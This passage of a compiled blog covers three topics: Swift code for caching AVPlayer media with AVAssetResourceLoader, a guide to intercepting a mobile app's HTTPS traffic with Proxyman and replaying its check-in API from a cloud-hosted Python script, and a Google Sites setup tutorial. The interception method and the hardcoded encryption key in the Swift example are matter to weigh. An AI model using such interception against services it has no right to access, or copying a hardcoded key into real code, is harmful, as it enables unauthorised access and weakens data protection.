+ func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive response: URLResponse, completionHandler: @escaping (URLSession.ResponseDisposition) -> Void) {
+ self.response = response
+ completionHandler(.allow)
+ }
+
+ func urlSession(_ session: URLSession, task: URLSessionTask, didCompleteWithError error: Error?) {
+ self.isFinished = true
+ self.loaderQueue.async {
+ if self.type == .contentInformation {
+ guard error == nil,
+ let response = self.response as? HTTPURLResponse else {
+ let responseError = error ?? ResponseUnExpectedError()
+ self.delegate?.contentInformationDidComplete(self, .failure(responseError))
+ return
+ }
+
+ let contentInformation = AssetDataContentInformation()
+
+ if let rangeString = response.allHeaderFields["Content-Range"] as? String,
+ let bytesString = rangeString.split(separator: "/").map({String($0)}).last,
+ let bytes = Int64(bytesString) {
+ contentInformation.contentLength = bytes
+ }
+
+ if let mimeType = response.mimeType,
+ let contentType = UTTypeCreatePreferredIdentifierForTag(kUTTagClassMIMEType, mimeType as CFString, nil)?.takeRetainedValue() {
+ contentInformation.contentType = contentType as String
+ }
+
+ if let value = response.allHeaderFields["Accept-Ranges"] as? String,
+ value == "bytes" {
+ contentInformation.isByteRangeAccessSupported = true
+ } else {
+ contentInformation.isByteRangeAccessSupported = false
+ }
+
+ self.assetDataManager?.saveContentInformation(contentInformation)
+ self.delegate?.contentInformationDidComplete(self, .success(contentInformation))
+ } else {
+ if let offset = self.requestRange?.start, self.downloadedData.count > 0 {
+ self.assetDataManager?.saveDownloadedData(self.downloadedData, offset: Int(offset))
+ }
+ self.delegate?.dataRequestDidComplete(self, error, self.downloadedData)
+ }
+ }
+ }
+}
+
Encapsulation for Remote Request, mainly for data requests initiated by ResourceLoader.
RequestType: used to distinguish whether this request is the first request for file information (contentInformation) or a data request (dataRequest).
RequestRange: the request's Range scope; end can specify a position (requestTo(Int64)) or the end of the resource (requestToEnd).
File information can be obtained from:
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive response: URLResponse, completionHandler: @escaping (URLSession.ResponseDisposition) -> Void)
Get the Response Header from it. Additionally, note that if you want to change to HEAD, it won’t enter here; you need to use other methods to receive it.
- isByteRangeAccessSupported: check Accept-Ranges == bytes in the Response Header.
- contentType: the file type information required by the player, formatted as a Uniform Type Identifier, e.g., not audio/mpeg but public.mp3.
- contentLength: check Content-Range in the Response Header: bytes 0-1/total length of the resource.

⚠️ Note that the header names given by the server may vary in case. They may not be written exactly as Accept-Ranges/Content-Range; some servers use lowercase accept-ranges, Accept-ranges…
Supplement: If you need to consider case sensitivity, you can write an HTTPURLResponse Extension
import CoreServices
+
+extension HTTPURLResponse {
+ func parseContentLengthFromContentRange() -> Int64? {
+ let contentRangeKeys: [String] = [
+ "Content-Range",
+ "content-range",
+ "Content-range",
+ "content-Range"
+ ]
+
+ var rangeString: String?
+ for key in contentRangeKeys {
+ if let value = self.allHeaderFields[key] as? String {
+ rangeString = value
+ break
+ }
+ }
+
+ guard let rangeString = rangeString,
+ let contentLengthString = rangeString.split(separator: "/").map({String($0)}).last,
+ let contentLength = Int64(contentLengthString) else {
+ return nil
+ }
+
+ return contentLength
+ }
+
+ func parseAcceptRanges() -> Bool? {
+ let contentRangeKeys: [String] = [
+ "Accept-Ranges",
+ "accept-ranges",
+ "Accept-ranges",
+ "accept-Ranges"
+ ]
+
+ var rangeString: String?
+ for key in contentRangeKeys {
+ if let value = self.allHeaderFields[key] as? String {
+ rangeString = value
+ break
+ }
+ }
+
+ guard let rangeString = rangeString else {
+ return nil
+ }
+
+ return rangeString == "bytes" || rangeString == "Bytes"
+ }
+
+ func mimeTypeUTI() -> String? {
+ guard let mimeType = self.mimeType,
+ let contentType = UTTypeCreatePreferredIdentifierForTag(kUTTagClassMIMEType, mimeType as CFString, nil)?.takeRetainedValue() else {
+ return nil
+ }
+
+ return contentType as String
+ }
+}
+
Usage:
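A sketch of how the extension above could replace the manual header parsing in didCompleteWithError, using the AssetDataContentInformation model defined earlier (the fallback defaults here are assumptions):

import Foundation

func makeContentInformation(from response: HTTPURLResponse) -> AssetDataContentInformation {
    let contentInformation = AssetDataContentInformation()
    // Fall back to neutral defaults when a header is missing or unparsable.
    contentInformation.contentLength = response.parseContentLengthFromContentRange() ?? 0
    contentInformation.contentType = response.mimeTypeUTI() ?? ""
    contentInformation.isByteRangeAccessSupported = response.parseAcceptRanges() ?? false
    return contentInformation
}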
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data)
+
As mentioned in the preliminary knowledge, the downloaded data arrives in real time, so this method keeps getting called with fragments of Data; we append them to downloadedData for storage.
func urlSession(_ session: URLSession, task: URLSessionTask, didCompleteWithError error: Error?)
+
This method is called when the task is canceled or completed; this is where the downloaded data gets saved.
As mentioned in the preliminary knowledge about the Cancel mechanism, the player initiates a Cancel Request once it has obtained enough data, so when this method is called the error will typically be NSURLErrorCancelled. Therefore, regardless of the error, we try to save whatever data we have already received.
⚠️ Since URLSession callbacks arrive concurrently, make sure all operations are performed on the same serial DispatchQueue to avoid data corruption (corrupted data also leads to playback problems).
⚠️ If the URLSession never calls finishTasksAndInvalidate or invalidateAndCancel, it strongly retains its objects and causes a Memory Leak. Therefore, whether canceling or completing, we must call one of these methods to release the Request when the task ends.
⚠️ If you are concerned about downloadedData causing OOM, you can write it to local storage incrementally in didReceive Data instead.
import AVFoundation
+import Foundation
+
+class ResourceLoader: NSObject {
+
+ let loaderQueue = DispatchQueue(label: "li.zhgchg.resourceLoader.queue")
+
+ private var requests: [AVAssetResourceLoadingRequest: ResourceLoaderRequest] = [:]
+ private let cacheKey: String
+ private let originalURL: URL
+
+ init(asset: CachingAVURLAsset) {
+ self.cacheKey = asset.cacheKey
+ self.originalURL = asset.originalURL
+ super.init()
+ }
+
+ deinit {
+ self.requests.forEach { (request) in
+ request.value.cancel()
+ }
+ }
+}
+
+extension ResourceLoader: AVAssetResourceLoaderDelegate {
+ func resourceLoader(_ resourceLoader: AVAssetResourceLoader, shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool {
+
+ let type = ResourceLoader.resourceLoaderRequestType(loadingRequest)
+ let assetDataManager = PINCacheAssetDataManager(cacheKey: self.cacheKey)
+
+ if let assetData = assetDataManager.retrieveAssetData() {
+ if type == .contentInformation {
+ loadingRequest.contentInformationRequest?.contentLength = assetData.contentInformation.contentLength
+ loadingRequest.contentInformationRequest?.contentType = assetData.contentInformation.contentType
+ loadingRequest.contentInformationRequest?.isByteRangeAccessSupported = assetData.contentInformation.isByteRangeAccessSupported
+ loadingRequest.finishLoading()
+ return true
+ } else {
+ let range = ResourceLoader.resourceLoaderRequestRange(type, loadingRequest)
+ if assetData.mediaData.count > 0 {
+ let end: Int64
+ switch range.end {
+ case .requestTo(let rangeEnd):
+ end = rangeEnd
+ case .requestToEnd:
+ end = assetData.contentInformation.contentLength
+ }
+
+ if assetData.mediaData.count >= end {
+ let subData = assetData.mediaData.subdata(in: Int(range.start)..<Int(end))
+ loadingRequest.dataRequest?.respond(with: subData)
+ loadingRequest.finishLoading()
+ return true
+ } else if range.start <= assetData.mediaData.count {
+ // has cache data...but not enough
+ let subEnd = (assetData.mediaData.count > end) ? Int((end)) : (assetData.mediaData.count)
+ let subData = assetData.mediaData.subdata(in: Int(range.start)..<subEnd)
+ loadingRequest.dataRequest?.respond(with: subData)
+ }
+ }
+ }
+ }
+
+ let range = ResourceLoader.resourceLoaderRequestRange(type, loadingRequest)
+ let resourceLoaderRequest = ResourceLoaderRequest(originalURL: self.originalURL, type: type, loaderQueue: self.loaderQueue, assetDataManager: assetDataManager)
+ resourceLoaderRequest.delegate = self
+ self.requests[loadingRequest]?.cancel()
+ self.requests[loadingRequest] = resourceLoaderRequest
+ resourceLoaderRequest.start(requestRange: range)
+
+ return true
+ }
+
+ func resourceLoader(_ resourceLoader: AVAssetResourceLoader, didCancel loadingRequest: AVAssetResourceLoadingRequest) {
+ guard let resourceLoaderRequest = self.requests[loadingRequest] else {
+ return
+ }
+
+ resourceLoaderRequest.cancel()
+ requests.removeValue(forKey: loadingRequest)
+ }
+}
+
+extension ResourceLoader: ResourceLoaderRequestDelegate {
+ func contentInformationDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ result: Result<AssetDataContentInformation, Error>) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ switch result {
+ case .success(let contentInformation):
+ loadingRequest.contentInformationRequest?.contentType = contentInformation.contentType
+ loadingRequest.contentInformationRequest?.contentLength = contentInformation.contentLength
+ loadingRequest.contentInformationRequest?.isByteRangeAccessSupported = contentInformation.isByteRangeAccessSupported
+ loadingRequest.finishLoading()
+ case .failure(let error):
+ loadingRequest.finishLoading(with: error)
+ }
+ }
+
+ func dataRequestDidReceive(_ resourceLoaderRequest: ResourceLoaderRequest, _ data: Data) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ loadingRequest.dataRequest?.respond(with: data)
+ }
+
+ func dataRequestDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ error: Error?, _ downloadedData: Data) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ loadingRequest.finishLoading(with: error)
+ requests.removeValue(forKey: loadingRequest)
+ }
+}
+
+extension ResourceLoader {
+ static func resourceLoaderRequestType(_ loadingRequest: AVAssetResourceLoadingRequest) -> ResourceLoaderRequest.RequestType {
+ if let _ = loadingRequest.contentInformationRequest {
+ return .contentInformation
+ } else {
+ return .dataRequest
+ }
+ }
+
+ static func resourceLoaderRequestRange(_ type: ResourceLoaderRequest.RequestType, _ loadingRequest: AVAssetResourceLoadingRequest) -> ResourceLoaderRequest.RequestRange {
+ if type == .contentInformation {
+ return ResourceLoaderRequest.RequestRange(start: 0, end: .requestTo(1))
+ } else {
+ if loadingRequest.dataRequest?.requestsAllDataToEndOfResource == true {
+ let lowerBound = loadingRequest.dataRequest?.currentOffset ?? 0
+ return ResourceLoaderRequest.RequestRange(start: lowerBound, end: .requestToEnd)
+ } else {
+ let lowerBound = loadingRequest.dataRequest?.currentOffset ?? 0
+ let length = Int64(loadingRequest.dataRequest?.requestedLength ?? 1)
+ let upperBound = lowerBound + length
+ return ResourceLoaderRequest.RequestRange(start: lowerBound, end: .requestTo(upperBound))
+ }
+ }
+ }
+}
+
loadingRequest.contentInformationRequest != nil indicates the first request, where the player asks for file information.
When requesting file information, we need to provide these three pieces of information:
loadingRequest.contentInformationRequest?.isByteRangeAccessSupported: Whether Range access to the data is supported.
loadingRequest.contentInformationRequest?.contentType: Uniform Type Identifier.
loadingRequest.contentInformationRequest?.contentLength: Total file length (Int64).
loadingRequest.dataRequest?.requestedOffset gives the starting offset of the requested Range.
loadingRequest.dataRequest?.requestedLength gives the length of the requested Range.
loadingRequest.dataRequest?.requestsAllDataToEndOfResource == true means that regardless of the requested Range length, it fetches until the end of the resource.
loadingRequest.dataRequest?.respond(with: Data) returns the loaded Data to the player.
loadingRequest.dataRequest?.currentOffset gives the current data offset; each dataRequest?.respond(with: Data) call shifts the currentOffset forward.
loadingRequest.finishLoading() tells the player that all requested data has been loaded.
func resourceLoader(_ resourceLoader: AVAssetResourceLoader, shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool
+
When the player requests data, we first check if there is data in the local Cache. If there is, we return it; if only part of the data is available, we return that part. For example, if we have 0–100 locally and the player requests 0–200, we return 0–100 first.
If there is no local Cache or the returned data is insufficient, a ResourceLoaderRequest will be initiated to fetch data from the network.
func resourceLoader(_ resourceLoader: AVAssetResourceLoader, didCancel loadingRequest: AVAssetResourceLoadingRequest)
+
The player cancels the request, canceling the ResourceLoaderRequest.
You might have noticed that resourceLoaderRequestRange bases its offset on currentOffset; that is because we first respond with the locally cached data via dataRequest?.respond(with: Data), so we can simply continue the network request from the already-shifted offset.
private var requests: [AVAssetResourceLoadingRequest: ResourceLoaderRequest] = [:]
+
⚠️ Some examples use a single currentRequest: ResourceLoaderRequest property to store the request, which can be problematic: if the current request is still fetching data and the user seeks, the old request is canceled and a new one initiated, and these actions may not occur in order. Using a Dictionary for storage and lookup is safer!
⚠️ Ensure all operations are on the same DispatchQueue to prevent data inconsistencies.
Cancel all ongoing requests in deinit: a ResourceLoader deinit means the AVURLAsset has deinited, i.e. the player no longer needs this resource. We can therefore cancel the ongoing Requests; the data loaded so far is still written to the Cache.
Thanks to Lex 汤 for the guidance.
Thanks to 外孫女 for providing development advice and support.
Large video files may hit Out Of Memory issues in downloadedData and in AssetData/PINCacheAssetDataManager.
As mentioned earlier, to solve this you can use FileHandle seek read/write to manage the local Cache directly (replacing AssetData/PINCacheAssetDataManager), or look for projects on GitHub that handle reading/writing large data to file.
As stated in the preliminary knowledge, switching the playback target does not trigger a Cancel. With AVPlayer, the AVURLAsset deinits, so the download is interrupted anyway; but with AVQueuePlayer it is not, because the asset is still in the Queue and only the current item has advanced to the next one.
The only option here is to observe the notification that the playback target changed and then cancel the loading of the previous AVURLAsset (see the sketch after the snippet below):
asset.cancelLoading()
+
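A minimal sketch of that idea, assuming the assets above are enqueued in an AVQueuePlayer: observe the player's currentItem and cancel loading on the asset of the item that just finished.

import AVFoundation

final class QueuePlayerLoadingCanceller {
    private var observation: NSKeyValueObservation?

    init(player: AVQueuePlayer) {
        // currentItem is KVO-observable; when it changes, the previous item is no longer
        // playing but its asset may still be downloading through the ResourceLoader.
        observation = player.observe(\.currentItem, options: [.old]) { _, change in
            // oldValue is doubly optional because currentItem itself is optional.
            if let previousItem = change.oldValue ?? nil {
                (previousItem.asset as? AVURLAsset)?.cancelLoading()
            }
        }
    }
}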
Audio encryption/decryption can be performed in ResourceLoaderRequest when the Data is received, and for the locally stored data it can be done in AssetData's encode/decode.
CryptoKit (ChaChaPoly) usage example:
import CryptoKit
+import Foundation
+
+class AssetData: NSObject, NSCoding {
+ static let encryptionKeyString = "encryptionKeyExzhgchgli"
+ ...
+ func encode(with coder: NSCoder) {
+ coder.encode(self.contentInformation, forKey: #keyPath(AssetData.contentInformation))
+
+ if #available(iOS 13.0, *),
+ let encryptionData = try? ChaChaPoly.seal(self.mediaData, using: AssetData.encryptionKey).combined {
+ coder.encode(encryptionData, forKey: #keyPath(AssetData.mediaData))
+ } else {
+ //
+ }
+ }
+
+ required init?(coder: NSCoder) {
+ super.init()
+ ...
+ if let mediaData = coder.decodeObject(forKey: #keyPath(AssetData.mediaData)) as? Data {
+ if #available(iOS 13.0, *),
+ let sealedBox = try? ChaChaPoly.SealedBox(combined: mediaData),
+ let decryptedData = try? ChaChaPoly.open(sealedBox, using: AssetData.encryptionKey) {
+ self.mediaData = decryptedData
+ } else {
+ //
+ }
+ } else {
+ //
+ }
+ }
+}
+
PINCache includes PINMemoryCache and PINDiskCache. PINCache will handle reading from file to Memory or writing from Memory to file for us. We only need to operate on PINCache.
To find the Cache file location in the simulator:
Use NSHomeDirectory() to get the simulator file path.
Finder -> Go -> Paste the path
In Library -> Caches -> com.pinterest.PINDiskCache.ResourceLoader is the Resource Loader Cache directory we created.
PINCache(name: “ResourceLoader”), where the name is the directory name.
You can also specify the rootPath, and the directory can be moved under Documents (not afraid of being cleared by the system).
Set the maximum limit for PINCache:
PINCacheAssetDataManager.Cache.diskCache.byteLimit = 300 * 1024 * 1024 // max size: 300 MB
+ PINCacheAssetDataManager.Cache.diskCache.ageLimit = 90 * 60 * 60 * 24 // keep for 90 days
+
There are system default limits; setting a limit to 0 means files will not be proactively deleted.
I initially underestimated the difficulty of this feature, thinking it could be handled quickly; I ended up struggling and spending about two extra weeks on data storage issues. However, I now thoroughly understand the entire Resource Loader mechanism, GCD, and Data.
Finally, here are the references for how to implement it:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Creating a daily automatic check-in script using a check-in reward app as an example
Photo by Paweł Czerwiński
I have always had the habit of using Python to create small tools; some are serious, like automatically crawling data and generating reports for work, and some are less serious, like scheduling automatic checks for desired information or delegating tasks that would otherwise be done manually to scripts.
When it comes to automation, I have always been quite straightforward, setting up a computer to run Python scripts continuously; the advantage is simplicity and convenience, but the downside is the need for a device connected to the internet and power. Even a Raspberry Pi consumes a small amount of electricity and internet costs, and it cannot be remotely controlled to start or stop (it actually can, but it’s cumbersome). This time, I took advantage of a work break to explore a free & cloud-based method.
Move the Python script to the cloud for execution, schedule it to run automatically, and enable it to be started/stopped via the internet.
This article uses a script I wrote for a check-in reward app as an example. The script automatically checks in daily, so I don’t have to open the app manually; it also sends me a notification upon completion.
Completion Notification!
I previously wrote an article titled “The app uses HTTPS for transmission, but the data was still stolen.” The principle is similar, but this time I used Proxyman instead of mitmproxy; it’s also free but more user-friendly.
“Certificate” -> “Install Certificate On this Mac” -> “Installed & Trusted”
After installing the Root certificate on the computer, switch to the mobile:
“Certificate” -> “Install Certificate On iOS” -> “Physical Devices…”
Follow the instructions to set up the Proxy on your mobile and complete the certificate installation and activation.
At this point, Proxyman on the Mac will show the sniffed traffic. Click on the app API domain under the device IP that you want to view; the first time you view it, you need to click “Enable only this domain” for the subsequent traffic to be unpacked.
After “Enable only this domain,” you will see the newly intercepted traffic showing the original Request and Response information:
We use this method to sniff which API EndPoint is called and what data is sent when performing a check-in operation on the app. Record this information and use Python to simulate the request later.
⚠️ Note that some app token information may change, causing the Python simulated request to fail in the future. You need to understand more about the app token exchange method.
⚠️ If Proxyman is confirmed to be working properly, but the app cannot make requests when Proxyman is enabled, it means the app may have SSL Pinning; currently, there is no solution, and you have to give up.
⚠️ App developers who want to know how to prevent sniffing can refer to the previous article.
POST /usercenter HTTP/1.1
+Host: zhgchg.li
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=dafd27784f94904dd586d4ca19d8ae62
+Connection: keep-alive
+Accept: */*
+User-Agent: (iPhone12,3;iOS 14.5)
+Content-Length: 1076
+Accept-Language: zh-tw
+Accept-Encoding: gzip, deflate, br
+AuthToken: 12345
+
Before writing the Python script, we can first use Postman to debug the parameters and see which parameters are necessary or change over time; but you can also directly copy them.
checkIn.py:
import requests
+import json
+
+def main(args):
+ results = {}
+ try:
+ data = { "action" : "checkIn" }
+ headers = { "Cookie" : "PHPSESSID=dafd27784f94904dd586d4ca19d8ae62",
+ "AuthToken" : "12345",
+ "User-Agent" : "(iPhone12,3;iOS 14.5)"
+ }
+
+ request = requests.post('https://zhgchg.li/usercenter', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result['status_code'] == 200:
+ return "CheckIn Success!"
+ else:
+ return result['message']
+ except Exception as e:
+ return str(e)
+
⚠️ The purpose of the args parameter in main(args) will be explained later. If you want to test locally, just call main(True).
Using the Requests library to execute HTTP Requests, if you encounter:
ImportError: No module named requests
+
Please install the library using pip install requests.
I made this part very simple, just for reference, and only to notify myself.
Fill in the basic information in the next step and click “Create” to submit.
With the User ID and Token, we can send messages to ourselves.
Since we don’t need other functionalities, we don’t even need to install the python line sdk, just send HTTP requests directly.
After integrating with the previous Python script…
checkIn.py:
import requests
+import json
+
+def main(args):
+ results = {}
+ try:
+ data = { "action" : "checkIn" }
+ headers = { "Cookie" : "PHPSESSID=dafd27784f94904dd586d4ca19d8ae62",
+ "AuthToken" : "12345",
+ "User-Agent" : "(iPhone12,3;iOS 14.5)"
+ }
+
+ request = requests.post('https://zhgchg.li/usercenter', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result['status_code'] == 200:
+ sendLineNotification("CheckIn Success!")
+ return "CheckIn Success!"
+ else:
+ sendLineNotification(result['message'])
+ return result['message']
+ except Exception as e:
+ sendLineNotification(str(e))
+ return str(e)
+
+def sendLineNotification(message):
+ data = {
+ "to" : "Your User ID here",
+ "messages" : [
+ {
+ "type" : "text",
+ "text" : message
+ }
+ ]
+ }
+ headers = {
+ "Content-Type" : "application/json",
+ "Authorization" : "Your channel access token here"
+ }
+ request = requests.post('https://api.line.me/v2/bot/message/push',json = data, headers = headers)
+
Test if the notification was sent successfully:
Success!
A small note, I originally wanted to use Gmail SMTP to send emails for notifications, but after uploading to Google Cloud, I found it couldn’t be used…
After covering the basics, let’s get to the main event of this article: moving the Python script to the cloud.
Initially, I aimed for Google Cloud Run but found it too complicated and didn’t want to spend time researching it because my needs are minimal and don’t require so many features. So, I used Google Cloud Function, a serverless solution; it’s more commonly used to build serverless web services.
⚠️ Note down the “ Trigger URL“
Region options: US-WEST1, US-CENTRAL1, and US-EAST1 enjoy free Cloud Storage service quotas; asia-east2 (Hong Kong) is closer to us but incurs a small Cloud Storage fee.
⚠️ Creating Cloud Functions requires Cloud Storage to store the code.
⚠️ For detailed pricing, please refer to the end of the article.
Trigger type: HTTP
Authentication: Depending on your needs, I want to be able to execute the script from an external link, so I choose “Allow unauthenticated invocations”; if you choose to require authentication, the Scheduler service will also need corresponding settings.
Variables, network, and advanced settings can be set in the variables section for Python to use (this way, if parameters change, you don’t need to modify the Python code):
How to call in Python:
import os
+
+def main(request):
+ return os.environ.get('test', 'DEFAULT VALUE')
+
No need to change other settings, just “Save” -> “Next”.
A supplement on main(args): as mentioned earlier, this service is more commonly used for serverless web, so args is actually a Request object from which you can read the HTTP GET query and HTTP POST body data, as follows:
# Get GET query information:
+request_args = args.args
+
example: ?name=zhgchgli => request_args = {"name": "zhgchgli"}
# Get POST body data:
+request_json = args.get_json(silent=True)
+
example: name=zhgchgli => request_json = {"name": "zhgchgli"}
If testing POST with Postman, remember to use “Raw+JSON” POST data, otherwise, nothing will be received:
We use the “requests” package to help us make API calls, which is not in the native Python library; so we need to add it here:
requests>=2.25.1
+
Specify version ≥ 2.25.1 here, or just enter requests to install the latest version.
It takes about 1-3 minutes to complete the deployment.
If 500 Internal Server Error appears, it means there is an error in the program. You can click the name to view the "Logs" and find the reason:
UnboundLocalError: local variable 'db' referenced before assignment
+
If the test is fine, it’s done! We have successfully moved the Python script to the cloud.
According to our needs, we need a place to store and read the token of the check-in APP; because the token may expire, it needs to be re-requested and written for use in the next execution.
To dynamically pass variables from the outside to the script, the following methods are available:
In the program, files deployed with the code can be read using the relative path ./, but they are read-only and cannot be modified dynamically; to change them, you can only edit in the console and redeploy.
To read and dynamically modify, you need to connect to other GCP services, such as: Cloud SQL, Google Storage, Firebase Cloud Firestore…
According to the Getting Started Guide, after creating the Firebase project, enter the Firebase console:
Find “ Cloud Firestore “ in the left menu -> “ Add Collection “
Enter the collection ID.
Enter the data content.
A collection can have multiple documents, and each document can have its own field content; it is very flexible to use.
In Python:
First, go to GCP Console -> IAM & Admin -> Service Accounts, and follow the steps below to download the authentication private key file:
First, select the account:
Below, “Add Key” -> “Create New Key”
Select “JSON” to download the file.
Place this JSON file in the same directory as the Python project.
In the local development environment:
pip install --upgrade firebase-admin
+
Install the firebase-admin package.
In Cloud Functions, add firebase-admin to requirements.txt.
Once the environment is set up, we can read the data we just added:
firebase_admin.py:
import firebase_admin
+from firebase_admin import credentials
+from firebase_admin import firestore
+
+if not firebase_admin._apps:
+ cred = credentials.Certificate('./authentication.json')
+ firebase_admin.initialize_app(cred)
+# Because initializing the app multiple times will cause the following error
+# providing an app name as the second argument. In most cases you only need to call initialize_app() once. But if you do want to initialize multiple apps, pass a second argument to initialize_app() to give each app a unique name.
+# So to be safe, check if it is already initialized before calling initialize_app
+
+db = firestore.client()
+ref = db.collection(u'example') # Collection name
+stream = ref.stream()
+for data in stream:
+ print("id:"+data.id+","+data.to_dict())
+
If you are on Cloud Functions, you can either upload the authentication JSON file together or change the connection syntax as follows:
cred = credentials.ApplicationDefault()
+firebase_admin.initialize_app(cred, {
+ 'projectId': project_id,
+})
+
+db = firestore.client()
+
If you encounter "Failed to initialize a certificate credential.", please check that the authentication JSON is correct.
For more operations like adding or deleting, please refer to the official documentation.
After having the script, the next step is to make it run automatically to achieve our final goal.
Execution frequency: Same as crontab input method. If you are not familiar with crontab syntax, you can directly use crontab.guru this amazing website:
It can clearly translate the actual meaning of the syntax you set. (Click next to see the next execution time)
Here I set 15 1 * * *, because the check-in only needs to run once a day; it executes at 1:15 AM every day.
URL part: Enter the “ trigger URL “ noted earlier
Time zone: Enter “Taiwan”, select Taipei Standard Time
HTTP method: According to the previous Python code, we use Get
If you set "authentication" earlier, remember to expand "SHOW MORE" to set up authentication.
After filling everything out, press “ Create “.
⚠️ Please note that the execution result “failure” only refers to web status codes 400~500 or errors in the Python program.
We have achieved the goal of uploading the routine task Python script to the cloud and setting it to run automatically.
Another very important part is the pricing; Google Cloud and Linebot are not completely free services, so understanding the pricing is crucial. Otherwise, for a small script, paying too much money might not be worth it compared to just running it on a computer.
Refer to the official pricing information, which is free for up to 500 messages per month.
Refer to the official pricing information, which includes 2 million invocations, 400,000 GB-seconds, 200,000 GHz-seconds of compute time, and 5 GB of internet egress per month.
Refer to the official pricing information, which includes 1 GB of storage, 10 GB of data transfer per month, 50,000 reads per day, and 20,000 writes/deletes per day; sufficient for light usage!
Refer to the official pricing information, which allows 3 free jobs per account.
The above free quotas are more than enough for the script!
Despite all efforts, some services might still incur charges.
After creating Cloud Functions, two Cloud Storage instances will be automatically created:
If you chose US-WEST1, US-CENTRAL1, or US-EAST1 for Cloud Functions, you can enjoy free usage quotas:
I chose US-CENTRAL1, and you can see that the first Cloud Storage instance is indeed in US-CENTRAL1, but the second one is labeled Multiple regions in the US; I estimate this one will incur charges.
Refer to the official pricing information, which varies by region.
The code isn’t large, so I estimate the minimum charge will be around 0.0X0 per month (?)
⚠️ The above information was recorded on 2021/02/21, and the actual prices may vary. This is for reference only.
Just in case… if the usage exceeds the free quota and starts incurring charges, I want to receive notifications to avoid unexpectedly high bills due to program errors.
Click “View Detailed Deduction Records” to enter.
Next step.
Next step.
Here you can set the action to trigger a notification when the budget reaches a certain percentage.
Check “Send alerts to billing administrators and users via email”, so that when the condition is triggered, you will receive a notification immediately.
Click “Finish” to submit and save.
When the budget is exceeded, we can know immediately to avoid incurring more costs.
Human energy is limited. In today's flood of technological information, every platform and service wants to extract our limited energy. If we can use some automated scripts to take over parts of daily life, we can save more energy to focus on the important things!
If you have any questions or comments, feel free to contact me.
If you have any automation-related optimization needs, feel free to commission me. Thank you.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
New Google Site Personal Website Building Experience and Setup Tutorial
Currently, I have used my self-written ZMediumToMarkdown tool to package and download Medium articles and convert them to Markdown format, migrating to Jekyll.
Last year, when I changed jobs, I “extravagantly” registered a domain name to serve as a personal resume link; after half a year, I thought of making the domain more useful by adding more information. On the other hand, I was also looking for a second website to back up the articles published on Medium, just in case.
Around 2010, I used the old version of Google Site to create a personal website -> file download center page; the impression is a bit vague, but I remember the layout was cumbersome, and the interface was not smooth. After 10 years, I thought this service had been discontinued. I accidentally saw a domain investor using it to create a domain parking page with contact information for sale:
At first glance, I thought, “Wow! The visuals are nice, they even made a page to sell the domain.” Upon closer inspection of the bottom left corner, I realized, “Wow! It’s built with Google Site,” which is vastly different from the interface I used 10 years ago. After checking, I found out that Google Site had not been discontinued; instead, a new version was launched in 2016. Although it’s been almost five years since then, at least the interface is up-to-date!
Before saying anything else, let’s take a look at the finished product I made. If you also “feel the same,” you might consider giving it a try!
City Corner (Waterfall Photo Display)
Article Directory (Link to Medium)
Contact Me (Embedded Google Form)
To save reading time, I’ll get straight to the point; I’m still looking for a more suitable service option. Although it is continuously maintained and updated, Google Site has several critical shortcomings that are important to me. Here are the fatal flaws I encountered while using it.
Code blocks only get a gray background, with no syntax coloring. If you want to embed a Gist, you can only use Embed JavaScript (iframe), but Google Site does not handle it well: the height cannot adapt to page scaling, resulting in either too much blank space or two scroll bars on small mobile screens, which is very ugly and hard to read.
1. Low Intrusiveness, only a floating exclamation mark at the bottom left that shows "Google Collaboration Platform Report Abuse" when clicked
2. Easy-to-use Interface, quickly create pages by dragging components on the right
Similar to wix/weebly or cakeresume? Just drag and fill in the components to complete the layout!
3. Supports RWD, built-in search, navigation bar
4. Supports Landing Page
5. No special traffic limits, capacity depends on the creator’s Google Drive limit
6. 🌟 Can bind to your own domain
7. 🌟 Can directly integrate GA for visitor analysis
8. Official Community collects feedback and continuously maintains updates
9. Supports announcement notifications
10. 🌟 Seamlessly embeds YouTube, Google Forms, Google Slides, Google Docs, Google Calendar, Google Maps, and supports RWD for desktop/mobile browsing
11. 🌟 Page content supports JavaScript/Html/CSS embedding
12. Clean and simple URLs (http://example.com/page-name/subpage-name), customizable page path names
13. 🌟 Page layout has reference lines/auto-alignment, very considerate
Reference alignment lines appear when dragging components
I think Google Site is only suitable for very lightweight web services, such as school clubs, small event websites, personal resumes.
List some problems I encountered and solved during use; everything else is WYSIWYG operations, nothing much to record.
1. Go to http://google.com/webmasters/verification
2. Click “ Add a property “ and enter “ Your domain “, then click “Continue”
3. Choose your “ Domain name provider “ and copy the “ DNS verification string “
4. Go to your domain name provider’s website (Here we use Namecheap.com as an example, others are similar)
In the DNS settings section, add a new record, select “ TXT Record “ as the type, enter “ @ “ as the host, and enter the DNS verification string you just copied as the value, then click add to submit.
Add another record, select “ CNAME Record “ as the type, enter “ www (or the subdomain you want to use) “ as the host, and enter “ ghs.googlehosted.com. “ as the value, then click add to submit.
Additionally, you can also redirect http://zhgchg.li -> http://www.zhgchg.li
After setting this up, you need to wait a bit… waiting for the DNS records to take effect…
5. Go back to Google Master and click verify
If you see “Verification failed”, don't worry! Please wait a bit longer; if it still doesn't work after an hour, go back and check if there are any mistakes in the settings.
Successfully verified domain ownership
6. Go back to your Google Site settings page
Click the top right “ Gear (Settings) “ and select “ Custom URLs “, enter the domain name you want to assign, or the subdomain you want to use, and click “ Assign “.
After successfully assigning, close the settings window and click the top right “ Publish “ to publish.
Again, you need to wait a bit… waiting for the DNS records to take effect…
